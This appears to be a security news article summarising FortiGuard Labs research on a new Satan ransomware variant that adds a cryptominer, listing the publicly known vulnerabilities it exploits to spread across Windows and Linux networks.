Security researchers have discovered a new variant of Satan ransomware using Cryptominer malware as an additional payload.
The new campaign was discovered security researchers at FortiGuard Labs targeting both Windows and Linux users.
The ransomware was seen leveraging a large number of vulnerabilities to propagate itself through public and external networks.
For both Windows and Linux, the initial spreader can propagate through both public and external networks.
In earlier campaigns, the Linux component (conn32/64) was only propagating through non-Class A type private networks. Now its been updated to supports both private and public network propagation.
In the case of Windows, it still leverages the EternalBlue exploit from NSA.
Some of the targeted vulnerabilities by Satan ransomware is given below:
- JBoss default configuration vulnerability (CVE-2010-0738)
- Tomcat arbitrary file upload vulnerability (CVE-2017-12615
- WebLogic arbitrary file upload vulnerability (CVE-2018-2894)
- WebLogic WLS component vulnerability (CVE-2017-10271)
- Windows SMB remote code execution vulnerability (MS17-010)
- Spring Data Commons remote code execution vulnerability (CVE-2018-12
In the new campaign, the researchers spotted the addition of several web application remote code execution exploits for both Windows and Linux. The following are the new vulnerabilities targeted by this new variant:
- Spring Data REST Patch Request (CVE-2017-8046)
- ElasticSearch (CVE-2015-1427)
- ThinkPHP 5.X Remote Code Execution (no CVE)
In the case propagation method it performs “ IP address traversal and attempts to scan and execute its entire list of exploits on every IP address encountered, along with its corresponding hardcoded port list “.
Researchers also observed the ransomware also attempts to scan some applications like Drupal, XML-RPC, Adobe, etc.
It notifies the command server if the application exists. The reason may be to gather statistics of application usage intending to use it for future attacks.
“Satan Ransomware is becoming more and more aggressive with its spreading. By expanding the number of vulnerable web services and applications it targets, it increases its chance of finding another victim and generating more profits. In addition, Satan Ransomware has also already adopted the Ransomware-as-a-Service scheme, opening it up to use by more threat actors, which means more attacks and more revenue.” said in the blog post published by FortiGuard Labs reaseachers.
You may be interested in reading: WhatsApp Critical Flaw Allowed Installation of Spyware on to Phones